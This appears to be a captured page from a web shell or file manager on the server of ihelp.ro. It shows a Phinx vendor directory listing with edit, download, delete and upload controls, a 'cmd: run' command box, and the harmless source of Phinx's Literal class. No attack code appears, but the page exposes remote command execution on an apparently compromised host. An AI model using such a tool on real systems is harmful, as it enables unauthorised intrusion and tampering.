/
var
/
www
/
vhosts
/
ihelp.ro
/
_OLD
/
vendor
/
robmorgan
/
phinx
/
src
/
Phinx
/
Util
/
/var/www/vhosts/ihelp.ro/_OLD/vendor/robmorgan/phinx/src/Phinx/Util
mkdir
upload
Name
Size
Mode
Actions
Expression.php
704
0644
edit
dl
rm
Literal.php
721
0644
edit
dl
rm
Util.php
8551
0644
edit
dl
rm
Edit:
/var/www/vhosts/ihelp.ro/_OLD/vendor/robmorgan/phinx/src/Phinx/Util/Literal.php
(721B)
<?php /** * MIT License * For full license information, please view the LICENSE file that was distributed with this source code. */ namespace Phinx\Util; class Literal { /** * @var string The literal's value */ protected $value; /** * @param string $value The literal's value */ public function __construct($value) { $this->value = $value; } /** * @return string Returns the literal's value */ public function __toString() { return $this->value; } /** * @param string $value The literal's value * * @return self */ public static function from($value) { return new self($value); } }
Save
cmd:
run